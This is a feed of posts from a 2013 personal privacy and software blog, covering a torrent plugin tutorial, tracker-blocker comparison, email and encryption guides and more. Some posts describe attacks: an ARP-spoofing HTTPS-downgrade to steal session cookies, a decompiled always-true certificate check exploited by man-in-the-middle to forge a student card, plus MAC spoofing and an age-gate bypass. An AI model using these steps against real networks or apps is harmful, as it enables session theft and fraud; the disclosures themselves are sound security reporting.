development:kejsarmakten2016-07-02T13:41:25+02:00http://blog.kejsarmakten.se/Christopher Käckchristopher.kack@gmail.comWriting a plug-in for Baretorrent2013-10-27T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/10/27/baretorrent-plugin<h2>Writing a plug-in for Baretorrent</h2>
<p class="publish_date">27 oct 2013</p>
<p>Today I ran across <a href="http://baretorrent.org">Baretorrent</a> on <a href="https://news.ycombinator.com/item?id=6620696">HN</a>. Looking around I found that the project supported some really simple extensibility. So here is how you set up a simple plugin to fix something for your personal needs or as a useful tool for others.</p>
<p><a href="https://bazaar.launchpad.net/~jonathanmcdougall/baretorrent/trunk/view/head:/EXTENSIONS">This info is completely based on the nice docs from the project</a>.</p>
<p>The plugin consists of two files, <em>btx.txt</em> and <em>main.py</em>.</p>
<p><em>btx.txt</em> contains some information on your application, such as guid, name and description. If we were to build, lets say, a automatic subtitle downloader, the file might look like this.</p>
<pre class="prettyprint">
guid = E5258701-DF85-4CA9-819F-E44F065C4E55
name = subtitles
author = Christopher Käck
short_description = Downloads subtitles for files queued.
long_description = Downloads subtitles for downloads.
version = 0.1
email = christopher@kejsarmakten.se
website = http://blog.kejsarmakten.se
requires = 0.4.3
</pre>
<p>Read about the different fields in the documentation linked above.</p>
<p>The <em>main.py</em> file is a simple python 3 file which defines some methods which baretorrent will trigger on certain events. <br />
The file contains the python standard library, libtorrent and baretorrent modules.</p>
<p>To make the module trigger on an event we need to declare an event listener. This is easily done in the <em>init</em> method. The different events are described in the documentation. In our example subtitle downloader we want to hook on the event when a new torrent is added. We put this hook in the <em>main.py</em> file.</p>
<pre class="prettyprint">
def init():
""" Called on load """
baretorrent.register("torrent.added", "check_for_sub")
</pre>
<p>This tells baretorrent to call the method <em>check_for_sub</em> when a new torrent is added.</p>
<p>We then look in the docs to see what arguments are sent back to the callback function and use that info to define <em>check_for_sub</em>.</p>
<pre class="prettyprint">
def check_for_sub(torrent):
baretorrent.log("Got " + torrent.name())
</pre>
<p>If we run baretorrent from the terminal we can now see that the title of the newly added torrents are printed to the log output.</p>
<p>Now we can simply utilize the python language to parse a subtitle api of our choice by searching for the torrent name. Here is some pseudo-code for that.</p>
<pre class="prettyprint">
def check_for_sub(torrent):
baretorrent.log("Got " + torrent.name())
url = call_subtitle_api(torrent.name())
download_subtitle_url(url)
</pre>
<p>The complete file would look something like this.</p>
<pre class="prettyprint">
import baretorrent
def init():
""" Called on load """
baretorrent.register("torrent.added", "check_for_sub")
def cleanup():
""" Called on shutdown """
pass
def uninstall():
""" Called when plugin uninstalled """
pass
def call_subtitle_api(name):
# call some api or parse some website, return download url
pass
def download_subtitle_url(url):
# Save url to disk. Load path from config?
def check_for_sub(torrent):
baretorrent.log("Got " + torrent.name())
url = call_subtitle_api(torrent.name())
download_subtitle_url(url)
baretorrent.log("Subtile was saved")
</pre>
<p>Now we need to package the plugin so we can publish it on our website or send it to some friends.</p>
<p>This is done by adding both <em>btx.txt</em> and <em>main.py</em> to a 7z file. On OS X you can do this by installing p7zip with brew</p>
<pre class="prettyprint">
> brew install pzip
> 7z a name_of_extension.7z btx.txt main.py
</pre>
<p>When this is done you can simply install the extension by pressing <em>Tools &#8594; Install extension</em>.</p>
<p>It should look something like this, and you are done!</p>
<center><a href="/images/baretorrent.png"><img width="601px" src="/images/baretorrent.png" /></a></center>#Phailin relief twitter bot2013-10-12T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2013/10/12/phailin-retweet<h2>#Phailin relief twitter bot</h2>
<p class="publish_date">12 Oct 2013</p>
<p>I saw this on twitter this morning.</p>
<blockquote class="twitter-tweet"><p><a href="https://twitter.com/quinnnorton">@quinnnorton</a> Ie. I asked 12 hrs ago if ppl could create a scraper, like the one used during Sandy. <strong>silence</strong></p><p>&mdash; Asher Wolf (@Asher_Wolf) <a href="https://twitter.com/Asher_Wolf/statuses/388956892287881216">October 12, 2013</a></blockquote><br />
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p>So I decided to fix it.</p>
<blockquote class="twitter-tweet"><p><a href="https://twitter.com/Asher_Wolf"><code>Asher_Wolf&lt;/a&gt; &lt;a href="https://twitter.com/quinnnorton"&gt;</code>quinnnorton</a> I am now up and running! (util I get blocked as a spam bot). If I stop working of act strange ping <a href="https://twitter.com/kejsarmakten">@kejsarmakten</a>.</p><p>&mdash; Phailin news retweet (@phailin18) <a href="https://twitter.com/phailin18/statuses/389038408724533248">October 12, 2013</a></blockquote><br />
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script></p>
<p>I wrote a small twitter bot that listens to the twitter stream <span class="caps">API</span> and retweets the #phailin hashtag when it is mentioned by a trusted source (list curated by @Asher_Wolf).</p>
<p><a href="https://twitter.com/phailin18/">Follow it here</a></p>There and back again: A plugin's tale.2013-09-18T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/09/18/disconnect-ghostery<h2>There and back again: A plugin&#8217;s tale.</h2>
<p class="publish_date">18 sep 2013</p>
<p>I sent this as a email to Ghostery today, and I thought it might be interesting for other people as well so I rewrote it as a blog post.</p>
<p>I switched back to <a href="https://www.ghostery.com/">Ghostery</a> from <a href="http://disconnect.me/">Disconnect.me</a> today after trying out disconnect.me for a few days.</p>
<p>Both applications (Firefox plugins) have the same main goal: <strong>block/limit how you are tracked by third parties on the Internet</strong>.</p>
<p>Here is a talk on the issues presented by one of the disconnect.me people on DefCon 19.</p>
<notextil>
<center>
<p><iframe width="560" height="315" src="//www.youtube.com/embed/iFhalqu7v7A" frameborder="0" allowfullscreen></iframe></p>
</center>
<p></notextile></p>
<h3>Why I switched from Ghostery to disconnect.me:</h3>
<ul>
<li>Disconnect.me&#8217;s UI is somewhat more appealing. (It looks very nice, shows how much speed you&#8217;ve gained from blocking etc).</li>
</ul>
<ul>
<li>Their source code is free, as in freedom.</li>
</ul>
<ul>
<li>Ghostery defaults to <strong>no blocking at all</strong>, you have to manually edit the settings to block everything. <em>This is a dangerous security trap to new users</em>.</li>
</ul>
<ul>
<li>Ghostery is owned by <a href="http://www.evidon.com/">Evidon</a> a company with the slogan <strong>&#8220;Rule the invisible web and grow your business&#8221;</strong> (how scary is that?). <a href="http://purplebox.ghostery.com/?p=1016023438">Ghostery comment on their relationship in their blog</a>.</li>
</ul>
<h3>Why I switched back to Ghostery:</h3>
<ul>
<li>Disconnect.me <a href="https://github.com/disconnectme/disconnect/issues/164#issuecomment-24628073">doesn&#8217;t want to block Piwik</a> since it is can be hosted by the provider of the site and not necessarily by a third party. <strong>Clarification:</strong> Disconnect base their blocking on domain names rather than technologies, thus Piwik (as a tech) is tricky for them to block until they can point out what third-party data collecting companies use piwik.</li>
</ul>
<ul>
<li>They don&#8217;t block supers spies disqus (the comments below) by default (since they deliver functionality), and if I choose to block them the entire comment section is removed without a place-holder. Ghostery puts a box where the comments should be, with a play button on it. This keeps the layout from being messed up and it makes sure I do not miss there is a comment section on the site I visit (while stil being protected from spying as long as I do not comment).</li>
</ul>
<ul>
<li>Most importantly: They have a <a href="https://www.eff.org/https-everywhere"><span class="caps">HTTPS</span> Everywhere</a> like functionality which defaults connections to <span class="caps">HTTPS</span>. This is very nice, but then I noticed this.</li>
</ul>
<center>
<blockquote class="twitter-tweet"><p>So I just need to block your https connections and you&#39;ll send me your password? thanks disconnect. <a href="http://t.co/zWRWen8l4T">pic.twitter.com/zWRWen8l4T</a></p>&mdash; Christopher Käck (@kejsarmakten) <a href="https://twitter.com/kejsarmakten/statuses/379958402543140864">September 17, 2013</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
</center>
<p>Disconnect.me defaults back to <span class="caps">HTTP</span> if <span class="caps">HTTPS</span> isn&#8217;t working on the sites. This presents this attack vector:</p>
<p>1. Run arpspoof on an open network and get all the traffic to route through you computer. <br />
2. Do only deliver packages to port 80 and drop anything to port 443. <br />
3. All disconnect.me clients will default to 80 and send you delicious cleartext cookies allowing you to log in to their accounts.</p>
<p>To quote an email I got as a response to my tweet.</p>
<p><em>&#8220;We made the user experience/security tradeoff in favor of user experience. Anyone who needs to be absolutely sure that their current session is encrypted should be checking it in their browser.&#8221;</em></p>
<p>I&#8217;d recommend all disconnect.me users to also use <span class="caps">HTTPS</span> Everywhere in their browsers, to avoid a false sense of security.</p>
<p><strong>Update</strong>: They took my suggestion and added a <a href="https://github.com/disconnectme/disconnect/issues/166">new ticket on Github about informing users about fallback to <span class="caps">HTTP</span></a>. Great!</p>
<p><strong>Update</strong>: Ghostery sent me this comparison page on different tracker blocking systems: <a href="http://www.areweprivateyet.com">Are we private yet?</a>.</p>
<p><em>To summarize I am eager to go back to disconnect.me since they seem to have a better and more transparent structure in their organization (open-source code, and reached out via e-mail after my tweet to explain the issues), but there are a few technical limitations in the way they handle blocking which makes me stay with Ghostery for the time being</em></p>
<p>Again, both are doing a great job but have limitations. <br />
Plugins like these are the only realistic way to deal with the problems that politicians try to solve with the stupid <a href="https://en.wikipedia.org/wiki/Do_Not_Track">DoNotTrack</a> flags and the <a href="http://www.pts.se/sv/Bransch/Regler/Lagar/Lag-om-elektronisk-kommunikation/Cookies-kakor/Fragor-och-svar-om-kakor-for-webbplatsinnehavare/#lagen">&#8216;kaklagen&#8217;/ &#8216;concent before cookie usage&#8217;-law</a> in Sweden.<br />
So hopefully both these will mature into plugins that will help empower the people of the Internet. <strong>It is very nice to see some competition in the field, heterogeneity is an important defense mechanism in immune systems in any population.</strong></p>
<p><strong>Update</strong></p>Studentkort-appen and client side security2013-09-16T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/09/16/studenkortet<h2>Studentkort-appen and client side security</h2>
<p class="publish_date">16 sep 2013</p>
<p>Last year the Swedish student union card <a href="http://www.studentkortet.se/">Studentkortet</a> launched an app that were to be a compliment to the physical card that identifies you as a student (and thus gives you entries to the student clubs/events in Lund and get the discounts in stores and public transportation).</p>
<p>The idea behind the app is simple, just display a copy of the real card in the application, show that to the salespersons/bouncers along with an ID that has the same name, and you get in/the discount.</p>
<p>The alert reader will now ask herself <em>&#8220;<span class="caps">WHAT</span>? Just show an image on my android/iphone!?&#8221;</em>. <br />
No, don&#8217;t you worry, the security was not only based on displaying an image (that would be stupid). To make it difficult to copy the makers decided to implement a &#8220;flip&#8221; animation, where you can turn the card over with a flick in the app and see the back of the card. That will stop people from just print-screening the application!</p>
<p>So, can&#8217;t we just make a new app and copy the nice looking animation and be on our way? Definitely. But why bother rewriting everything? <a href="https://twitter.com/implodekalle">We</a> had to take a look at the source code.</p>
<p>Since the app was deployed on Android you can just download the application and decompile it (<a href="https://events.ccc.de/congress/2012/wiki/Beginners_Guide_to_Android_Reverse_Engineering">check out this intro on android reverse engineering from last years <span class="caps">CCC</span></a>). As we suspected, the flip animation lay there ripe for the taking nicely decompiled. <br />
So now, just take that class and implement your own application. Security broken! But would we really bother writing a complete new application? We had a look around the source.</p>
<p>It would be easier just to trick the application to render the card info we would like it to show. We checked out how they handled communication with the server (you have to log in to display your student union card). <br />
<pre class="prettyprint">
public boolean verify(String paramAnonymousString, SSLSession paramAnonymousSSLSession)
{
return true;
}
</pre>
<br />
<strong>Oh</strong>. So They weren&#8217;t checking their certificates at all (but they had a <span class="caps">SSL</span> connection!).</p>
<p>Next step was to simply connect the phone to a <span class="caps">VPN</span> to my home network and stage a cute little Man in the Middle attack against the connection back to the server. What we did was simply to listen for certain calls which the application makes and replaced the image in the response. Hence this:</p>
<center><a href="/images/studenthack.jpg"><img width="200px" src="/images/studenthack.jpg" /></a></center>
<p>The reason I have waited to write about this until now is that I wanted to be nice to the brilliant people working with Student unions and nations in Lund (if your going there to study, join <a href="http://blekingska.se/">Blekingska</a> for happy-fun-time).</p>
<p>After I reporter the MitM-issue it took a few month until it was fixed. Since the problem lay client-side I had to wait a long while for most people to update their software.</p>
<p><em>Ofcourse, they stil base their security on that the end-user will have a hard time copying software/images on their own devices&#8230;</em></p>Köpa Bitcoins (swe)2013-09-09T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2013/09/09/bitcoin-i-sverige<h2>Köpa Bitcoins (swe)</h2>
<p class="publish_date">09 Sep 2013</p>
<p>Det finns flertalet sätt att införskaffa <a href="http://bitcoin.org/en/">Bitcoins</a> i Sverige. En kan skapa sina egna genom att <a href="http://startbitcoin.com/">&#8216;gräva&#8217;</a> efter bitcoins, köpa bitcoins från utländska försäljare eller så kan man vända sig till svenska distributörer.</p>
<p>Här är en lista på tre svenska leverantörer:</p>
<ul>
<li><a href="https://safello.com/sv/index.xhtml">Safello</a>. <a href="http://new.livestream.com/accounts/5180930/events/2354191">Automatiserad tjänst</a> som sitter på sin eget förrård av Bitcoins vilket låter transaktionerna gå snabbt. Man kan betala via bankgiro eller direktbetalning. Recenserade dem lite kort på Twitter och blev <a href="https://safello.com/sv/blogpost.xhtml?id=5">citerad på deras blogg</a>.</li>
<li><a href="http://www.btcx.se/">Btcx.se</a>. Företaget tycks helt ha bytt utseende sedan jag testade tjänsten senast (och stängt av <span class="caps">TLS</span> (!?)) så kanske även övrig teknik har förändrats. Fungerade bra, och jag fick de bitcoins jag beställt, men tyvärr det tre dagar för mina bitcoins att komma fram.</li>
<li><a href="https://localbitcoins.com/">Bitcoins för kontanter</a>. Möjligheten finns även att köpa av &#8216;privatpersoner&#8217; för kontanter. Jag har själv ej testat detta än och seriositeten varierar självklart mellan försäljare.</li>
</ul>
<blockquote class="twitter-tweet"><p>Testade nyss köpa BTC via Safello. Fungerade förvånansvärt smidigt. <a href="https://t.co/7eM3C88To8">https://t.co/7eM3C88To8</a></p>&mdash; Christopher Käck (@kejsarmakten) <a href="https://twitter.com/kejsarmakten/statuses/374646560887283712">September 2, 2013</a></blockquote>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
<p>För mer information på svenska rekommenderar jag den svenska siten <a href="http://www.bitcoin.se/">bitcoin.se</a></p>Chatta krypterat (swe)2013-09-01T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2013/09/01/chatta-krypterat<h2>Chatta krypterat (swe)</h2>
<p class="publish_date">01 Sep 2013</p>
<p><strong>Hur gör man för att chatta krypterat?</strong></p>
<p>För att kryptera vanlig IM chatt (jabber/xmpp/msn/yahoo/facebook/GoogleHangout) kan man utnyttja något som heter <a href="http://www.cypherpunks.ca/otr/index.php"><span class="caps">OTR</span>, Off-The-Record</a>. <span class="caps">OTR</span> är ett kryptoprotokoll som man kan använda via flera olika chattapplikationer. Som exempel kan man ladda ner en applikation som heter <a href="https://adium.im/">Adium</a> om man använder Mac.</p>
<p><strong>Ladda ner Adium</strong><br />
När man <a href="https://adium.im/">laddat ner Adium</a> kan man sedan välja att logga in på ett konto som du redan har, t.ex facebook, men jag förespråkar att du skapar dig ett nytt konto på en tjänst som inte avläses av amerikanska myndigheter (som bygger <a href="https://en.wikipedia.org/wiki/Sociogram">sociogram</a> även om du krypterar dina meddelanden) samt företagens anställda.</p>
<p><strong>Skapa ett nytt konto</strong><br />
För att skapa ett nytt konto så tryck <strong>Lägg till nytt konto</strong> välj <strong><span class="caps">XMPP</span></strong>. Välj ett användarnamn och lägg till <em>@jabber.ipredator.se</em> efter, eller <em>@jabber.ccc.de</em> om du hellre vill ha en tysk tjänst. Så ett användarnamn kan vara <strong>användare@jabber.ccc.de</strong>.</p>
<p><strong>Lägg till dina vänner</strong><br />
De du chattar med behöver också använda ett program som Adium, som stödjer <span class="caps">OTR</span>. Det finns massor av olika klienter att väja bland. <a href="https://jitsi.org/">Jitsi</a> och <a href="http://www.pidgin.im/">Pidgin</a> är några av mina favoriter. <a href="http://www.cypherpunks.ca/otr/software.php">Här</a> är en lång lista på klienter som stödjer <span class="caps">OTR</span> till allt från iPhone och Android till Windows. <br />
<em>När du chattar är det viktigt att du trycker i att du vill starta ett krypterat samtal</em>.</p>
<p><strong>Lär dig mer</strong><br />
Nu har du lyckats chatta krypterat med dina vänner! Det finns fortfarande mer saker som kan vara bra att kunna. T.ex. kan det vara bra att verifiera att det inte sitter någon på en server någonstans mitt mellan dig och den du pratar med, och avkrypterar meddelandet och läser det och sedan krypterar det igen och skickar vidare. Detta kan man undvika med hjälp av <a href="http://www.cypherpunks.ca/otr/help/fingerprint.php">&#8216;fingeravtryck&#8217;</a>.</p>
<p><em>Varför kan jag inte bara använda en färdig tjänst som har inbyggd kryptering, som Skype?</em> <br />
De flesta tjänster har bakdörrar öppna som gör det möjligt för myndigheter och anställda på företagen att läsa dina textmeddelanden. Det stämmer t.ex. för Skype. <a href="http://www.nytimes.com/2010/09/27/us/27wiretap.html">I <span class="caps">USA</span> arbetar</a> myndigheterna med att tvinga alla företag som agerar i <span class="caps">USA</span> att installera bakdörrar, detta gör att det ligger i ditt intresse att kryptera din kommunikation redan i klienten som du använder för chatt, och gärna att denna inte levereras av samma organisation som levererar dina meddelanden.</p>Change your MAC address on OS X2013-08-30T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/08/30/spoof-mac-on-osx<h2>Change your <span class="caps">MAC</span> address on OS X</h2>
<p class="publish_date">30 Aug 2013</p>
<p>This is a small snippet which you can put in your .bash_profile or .zshrc to easily change you <span class="caps">MAC</span> address on OS X.</p>
<pre class="prettyprint lang-bash">
function newmac(){
NEWMAC=$(openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//')
sudo ifconfig en0 ether $NEWMAC
echo "New MAC is"
echo $(ifconfig en0 | grep ether)
}
</pre>
<p>When you have put that in the file you can simply type &#8220;newmac&#8221; to change to a new random mac (after &#8216;source ~/.bash_profile&#8217; ofc). <br />
To select which mac to use manually just change the <span class="caps">NEWMAC</span> variable.</p>
<p>Based on <a href="http://osxdaily.com/2012/03/01/change-mac-address-os-x/">this tutorial</a>.</p>Cykelstaden Malmö (swe)2013-08-14T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2013/08/14/cykelstaden-malmo<h2>Cykelstaden Malmö (swe)</h2>
<p class="publish_date">14 Aug 2013</p>
<p><a href="http://cykelstaden.kejsarmakten.se"><img src="/images/cykelstaden.jpeg" width="650" ></a></p>
<p>Till frukostflingorna slängde jag ihop en webbapplikation ett par dagar sedan och publicerade den på <a href="http://hackernytt.se">hackernytt.se</a>,<br />
detta resulterade i att <a href="https://twitter.com/ehsanpo">någon</a> forkade in lite <span class="caps">CSS</span>. Kul!</p>
<p>Tanken med appen är att övervaka hur många cykelolyckor som sker i Malmö (som rapporteras av Polisen). Detta för att det känns ofta lite lätt livsfarligt att ta sig runt på <a href="http://blog.kejsarmakten.se/all/personal/2011/09/29/crescent-1948-valkenburg.html">cykel</a>. När jag tog mig en titt på Polisens Twitter-feed så kändes det inbland rätt tjockt med cykelolyckor (cyklister som blir påkörda).</p>
<p>För att verifiera att jag inte såg skuggmonster så skrev jag en liten webbvy som visar upp hur många cykelrelaterade olyckor som han rapporterats de senaste 31 dagarna och placerar ut dessa på en karta över Malmö.</p>
<p>Källkoden finns på Github: <a href="https://github.com/melpomene/cykelstadenmalmo">länk</a><br />
Applikationen hittar ni här: <a href="http://cykelstaden.kejsarmakten.se/">länk</a></p>(Privacy aware) non-US email providers2013-08-10T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2013/08/10/email-providers<h2>(Privacy aware) non-US email providers</h2>
<p class="publish_date">10 Aug 2013</p>
<p><a href="https://lavabit.com">Lavabit</a> was taken down a few days ago in an attempt to <a href="http://www.theguardian.com/technology/2013/aug/08/lavabit-email-shut-down-edward-snowden">stop government snooping on their customers</a>. <br />
This was an admirable move by Lavabit, but resulted in me needing to find a new email host. <br />
(You can always reach me on the mail on my contacts page which I host myself. Lavabit was used for an organisation I am running which I do not have the time to be email admin for).</p>
<table style="border:1px solid black;">
<tr>
<td> <strong>Provider</strong> </td>
<td> <strong>Price</strong> </td>
<td> <strong>Country</strong> </td>
<td> <strong>Other</strong> </td>
</tr>
<tr>
<td> <a href="http://www.orangewebsite.com/affiliate/idevaffiliate.php?id=10191">Orange Website</a> (aff.link) </td>
<td> &#36;4.54/month </td>
<td> Iceland </td>
<td> Bitcoins accepted, anonymous sign-up </td>
</tr>
<tr>
<td> <a href="https://countermail.com/">Counter Mail</a> </td>
<td> &#36;6.33/month </td>
<td> Sweden </td>
<td> <span class="caps">PGP</span> on incoming messages. Java client must be used. Accept bitcoin </td>
</tr>
<tr>
<td> <a href="https://www.neomailbox.com/services/custom-packages">Neomailbox</a> </td>
<td> &#36;49.95/year </td>
<td> Switzerland </td>
<td> Accept Digital Gold Currencies, anonymous sign-up </td>
</tr>
<tr>
<td> <a href="https://posteo.de/">Posteo</a> </td>
<td> &#8364;1/month </td>
<td> Germany </td>
<td> Claimed anonymous sign-up. No custom domains. </td>
</tr>
<tr>
<td> <a href="http://www.inventati.org/en/services/mail.html">A/I</a> </td>
<td> Donations (?) </td>
<td> <a href="http://www.inventati.org/en/about.html">Italy</a> </td>
<td> No new account due to high load </td>
</tr>
<tr>
<td> <a href="https://fripost.org/">Fripost</a> </td>
<td> 200 <span class="caps">SEK</span> one time fee (?) </td>
<td> Sweden </td>
<td> Claimed anonymous sign-up. &#8220;Not a service, an association&#8221; for people living in Sweden</td>
</tr>
<tr>
<td> <a href="https://mykolab.com">MyKolab</a> </td>
<td> &#8364;8,36/month </td>
<td> <a href="https://mykolab.com/legal-notice">Switzerland</a> </td>
<td> Calendar etc. </td>
</tr>
<tr>
<td> <a href="https://www.1984hosting.com/">1984 hosting</a> </td>
<td> &#36;6/month </td>
<td> <a href="https://www.1984hosting.com/about/">Iceland</a> </td>
<td> </td>
</tr>
<tr>
<td> <a href="https://protonmail.ch/">Protonmail</a> </td>
<td> Free </td>
<td> Switzerland </td>
<td> Claims no IP logs </td>
</tr>
</table>
<p><strong>Did I miss something? Comment!</strong></p>
<p>Other alternatives include hosting your own email address and not trusting third parties, this puts the security in your own hands, which can be both a good and a bad thing.</p>
<p>Preferably you run the mail server on hardware you are in physical control over, but when this is impossible you can to turn to Virtual Private Servers (<span class="caps">VPS</span>). My experience is that mail servers can be somewhat tricky to set up and get going in nice way, but there are several tutorials out there on how to do it on your own favorite platform. Remember to choose a host which have a good privacy policy and reside under a sane jurisdiction (avoid US and GB to avoid <span class="caps">NSA</span> and secret laws and court orders), I recommend checking out <a href="https://www.moln.is/">Moln.is</a> or <a href="http://www.bahnhof.net/">Bahnhof</a> (both Swedish so watch out for <a href="http://stoppafralagen.nu/"><span class="caps">FRA</span></a>) or maybe the dutch provider <a href="http://cyberbunker.com/web/index.php">Cyber Bunker</a>.</p>
<p>(and remember, do <em>not</em> rely on <a href="http://www.theregister.co.uk/2007/11/08/hushmail_court_orders/">Hushmail</a>!)</p>
<p><strong>If you found this interesting</strong>, maybe you would enjoy reading my list over <a href="/all/personal/2013/06/25/privacy-aware-VPN-providers.html">privacy aware <span class="caps">VPN</span> providers</a> and <a href="/all/personal/2013/07/10/end-2-end-encrypted-messenger-apps.html">end-to-end encrypted messenger applications</a>.</p>Sending anonymous emails (Swedish/English)2013-08-06T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2013/08/06/send-anonymous-emails<h2>Sending anonymous emails (Swedish/English)</h2>
<p class="publish_date">06 Aug 2013</p>
<p>Need to contact a news paper or an organisation with a tip and you fear exposing your identity? <br />
Here is a short guide on how to send anonymous emails presented in both <a href="#eng">English</a> and <a href="#swe">Swedish</a>.</p>
<h3 id="swe">Skicka anonyma mail (<a href="#eng">English below</a>)</h3>
<p>1. Ladda ner <a href="https://www.torproject.org/download/download-easy.html.en">Tor Browser bundle</a></p>
<center><a href="https://www.torproject.org/download/download-easy.html.en"><img src="/images/torbrowserbundle.png" width="200px" /></a></center>
<p>2. Starta Tor Browser bundle och vänta tills du får upp en webbläsare med grön text som säger &#8220;Congratulations. Your browser is configured to use Tor&#8221;.</p>
<p>3. Använd webbläsaren som du nyss öppnat för att gå till adressen: <a href="https://www.guerrillamail.com/compose">https://www.guerrillamail.com/compose</a>.</p>
<center><a href="https://www.torproject.org/download/download-easy.html.en"><img src="/images/guerillamail.png" width="600px" /></a></center>
<p>Där ifrån kan du anonymt skicka mail, tänk på att skriva ner adressen brevid <strong>Inbox id</strong> om du vill ta emot svar på ditt mail.</p>
<hr />
<h3 id="eng"><strong>Quick guide on how to send anonymous emails</strong></h3>
<p>1. Download <a href="https://www.torproject.org/download/download-easy.html.en">Tor Browser bundle</a></p>
<p>2. Start the Tor Browser bundle and wait until a browser is opened and it shows you a green text that says &#8220;Congratulations. Your browser is configured to use Tor&#8221;.</p>
<p>3. Use the browser to open the adress <a href="https://www.guerrillamail.com/compose">https://www.guerrillamail.com/compose</a>.</p>
<p>From there you can send anonymous emails. Remember to save the <strong>Inbox id</strong> if you want to be able to read responses to your email.</p>A praise to Little Brother and Homeland2013-08-01T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2013/08/01/little-brother-homeland<h2>A praise to Little Brother and Homeland</h2>
<p class="publish_date">04 Aug 2013</p>
<p><strong>Little Brother and its sequal Homeland is written by <a href="http://craphound.com/">Cory Doctorow</a></strong></p>
<p>I have just finished reading Homeland, the sequal to Cory Doctorows novel Little Brother, and here is a short pitch why you ought to read it as well.</p>
<p>The book is written for a younger reader, the &#8220;young adult&#8221;. This does not stand in the way for it’s brillance though, and it just makes me happier to know that this books is also read by the generation growing up right now.</p>
<p>The books are about a young person named Marcus and his life growing up. You can read about the synopsis in several places (like <a href="https://en.wikipedia.org/wiki/Little_Brother_%28Doctorow_novel%29">wikipedia</a>).</p>
<p>What is important though is that it can be read as a guide to survival and self defence in the modern age. Cory explains the basiscs of security, anonymity, hardware hacking and social reform in an simple and entertaining way. Topics that are mentioned and explained include <a href="https://www.torproject.org/"><span class="caps">TOR</span></a>, <a href="https://www.eff.org/"><span class="caps">EFF</span></a>, <a href="http://ipredator.se/">Ipredator</a>, <a href="https://en.wikipedia.org/wiki/Pretty_Good_Privacy"><span class="caps">PGP</span></a>, <a href="https://www.gnu.org/gnu/linux-and-gnu.html"><span class="caps">GNU</span>/Linux</a>, <a href="https://en.wikipedia.org/wiki/Bayesian_statistics">Bayesian statistics</a>, <a href="https://en.wikipedia.org/wiki/Aaron_Swartz">Aaron Swartz</a>, <a href="http://www.cyanogenmod.org/">Cyanogenmod</a> and even <a href="https://twitter.com/wilw">Will Wheaton</a>.</p>
<p>It is a highly entertaining book with a high recognition value if you are interested in politics and it&#8217;s application on the internet today. If you are not, then I suggest you read it either way, becuase you might very well become after reading it.</p>
<p>It even exsists as an audio book and <a href="http://craphound.com/littlebrother/download/">free e-book</a>.</p>
<p><iframe src='http://www.randomhouse.com/audio/catalog/display-embed-single.php?isbn=9780739372869&filename=Little%20Brother%20by%20Cory%20Doctorow%20%20-%20%20Random%20House%20Audio&file=http://www.randomhouse.com/catalog/mm/audio/4s_9780739372869.mp3' frameborder='0' height='300' width='250' scrolling='no'></iframe></p>
<p>You can buy the books from Amazon here (disclaimer: affiliate links):</p>
<p><a href="http://www.amazon.com/gp/product/B003X27L7M/ref=as_li_qf_sp_asin_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=B003X27L7M&linkCode=as2&tag=kejsarmakten-20"><img src="http://craphound.com/images/LittleBrother_withsticker.jpg" width="150px" /></a><img src="http://ir-na.amazon-adsystem.com/e/ir?t=kejsarmakten-20&l=as2&o=1&a=B003X27L7M" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" /> <a href="http://www.amazon.com/gp/product/0765333694/ref=as_li_qf_sp_asin_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0765333694&linkCode=as2&tag=kejsarmakten-20"><img src="http://craphound.com/homeland/homeland.jpg" width="150px" /></a><img src="http://ir-na.amazon-adsystem.com/e/ir?t=kejsarmakten-20&l=as2&o=1&a=0765333694" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" /></p>Avoid 'sign in to confirm age' on Youtube2013-07-15T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/07/15/avoid-sign-in-to-confirm-age-youtube<h2>Avoid &#8216;sign in to confirm age&#8217; on Youtube</h2>
<p class="publish_date">19 Jun 2013</p>
<p>When you are not logged in to Youtube you are unable to watch videos which have been marked as <strong>&#8220;inappropriate for some users&#8221;</strong>.</p>
<p><strong>If you do not want to get a Google account or if you want to avoid logging into Google on the computer you are at you can follow these simple steps to avoid the login restriction.</strong></p>
<p><em>We utilize that embedded videos do not force users to log in.</em></p>
<p><strong>1.</strong> First go to the video you want to watch on Youtube. In the example it is a song by King Fantastic.</p>
<p><a href="/images/y1.png"><img src="/images/y1.png" width="650px" /></a></p>
<p><strong>2.</strong> Press the <strong>share</strong> button under the video and select <strong>Embed</strong>. Then copy the code you see in the box.</p>
<p><a href="/images/y2.png"><img src="/images/y2.png" width="650px" /></a></p>
<p><strong>3.</strong> Go to the page <a href="http://jsfiddle.net">JsFiddle.net</a> which lets you experiment with rendering Javascript and <span class="caps">HTML</span>.</p>
<p><strong>4.</strong> Paste the code from the Youtube share box into the box in the upper left corner. It says <strong>html</strong>.</p>
<p><a href="/images/y3.png"><img src="/images/y3.png" width="650px" /></a></p>
<p><strong>5.</strong> Press the <strong>Play</strong> button on the top and voila, you can now watch the embedded video in the lower left window!</p>
<p><a href="/images/y4.jpeg"><img src="/images/y4.jpeg" width="650px" /></a></p>End-to-End encrypted messenger applications2013-07-10T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2013/07/10/end-2-end-encrypted-messenger-apps<h2>End-to-End encrypted messenger applications</h2>
<p class="publish_date">25 Jun 2013</p>
<p><a href="https://heml.is"><img src="/images/hemlis.png" width="650px" /></a></p>
